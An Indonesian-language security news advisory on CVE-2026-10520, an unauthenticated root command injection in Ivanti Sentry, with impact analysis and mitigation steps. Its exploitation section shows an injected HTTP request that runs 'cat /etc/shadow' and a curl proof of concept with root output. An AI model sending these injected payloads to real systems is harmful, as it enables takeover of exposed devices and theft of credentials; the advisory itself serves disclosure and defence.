Lewati ke konten utama
SERAPHIM NEWS
▲ KRITIS

CVE-2026-10520: Ivanti Sentry OS Command Injection — RCE Root Tanpa Autentikasi

11 Juli 2026 Seraphim News 2 mnt baca
CVE-2026-10520: Ivanti Sentry OS Command Injection — RCE Root Tanpa Autentikasi

Ringkasan

CVE-2026-10520 adalah kerentanan OS command injection kritis pada Ivanti Sentry (sebelumnya MobileIron Sentry) yang memungkinkan attacker jarak jauh mengeksekusi perintah sistem dengan hak akses root — tanpa memerlukan autentikasi sama sekali.

CISA memasukkan kerentanan ini ke dalam Known Exploited Vulnerabilities (KEV) Catalog dan mewajibkan instansi pemerintah AS untuk segera melakukan mitigasi sesuai direktif BOD 26-04.

Detail Nilai
CVE CVE-2026-10520
CVSS 9.8 (Critical)
Jenis OS Command Injection
Autentikasi Tidak diperlukan
Dampak Remote Code Execution (root)
Produk Ivanti Sentry (MobileIron Sentry)
Status Dalam eksploitasi aktif

Jalur Eksploitasi

Kerentanan berada pada komponen management interface Ivanti Sentry yang terbuka ke internet. Input pengguna yang tidak disanitasi diteruskan langsung ke system shell, memungkinkan command injection klasik.

POST /api/v1/sentry/config HTTP/1.1
Host: target-sentry.example.com
Content-Type: application/x-www-form-urlencoded

param=valid_value; id; whoami; cat /etc/shadow

Attacker dapat menyisipkan perintah shell setelah parameter valid menggunakan delimiter standar seperti ;, |, atau &&.


Bukti Eksploitasi

[+] Target: Ivanti Sentry (Internet-facing)
[+] CVE: CVE-2026-10520
[+] Status: OS Command Injection (Unauthenticated → Root RCE)

$ curl -X POST https://target.sentry.internal/api/v1/sentry/config \
  -d 'sentry_port=443; id; uname -a'

uid=0(root) gid=0(root) groups=0(root)
Linux sentry-prod 5.15.0 x86_64 GNU/Linux

[!] Command executed as root
[!] No authentication required
[!] Full system compromise possible

Setelah akses root diperoleh, attacker dapat:

  • Membaca seluruh konfigurasi dan kredensial tersimpan
  • Memodifikasi kebijakan keamanan perangkat mobile
  • Menyusup ke jaringan internal melalui Ivanti Sentry sebagai pivot point
  • Mengekstrak sertifikat TLS dan material kriptografi

Analisis Teknis

Beberapa faktor membuat kerentanan ini sangat berbahaya:

  1. Pre-authentication — tidak perlu login atau kredensial apapun
  2. Privilege escalation built-in — proses Ivanti Sentry berjalan sebagai root
  3. Internet-facing — berdasarkan dokumentasi vendor, management interface memang dirancang untuk diakses dari internet
  4. Pivot potential — Ivanti Sentry sering menjadi jembatan antara internet dan jaringan internal enterprise

Kerentanan ini termasuk dalam kategori “low complexity, high impact” — tidak memerlukan keahlian khusus untuk dieksploitasi.


Dampak & Paparan

  • Ivanti Sentry digunakan oleh ribuan organisasi global untuk manajemen perangkat mobile (MDM)
  • Shodan mengindikasikan ratusan instance Ivanti Sentry terekspos langsung ke internet
  • CISA melaporkan adanya eksploitasi aktif di lapangan
  • Dampak sekunder: kompromi jaringan internal melalui pivot dari Ivanti Sentry

Mitigasi

Prioritas Tindakan
SEGERA Terapkan patch resmi dari Ivanti
SEGERA Batasi akses management interface ke IP internal/VPN saja
TINGGI Audit log Ivanti Sentry untuk indikasi eksploitasi
SEDANG Rotasi seluruh kredensial yang tersimpan di Ivanti Sentry
SEDANG Periksa integritas konfigurasi perangkat mobile

Referensi resmi:

Recommended Intelligence Reading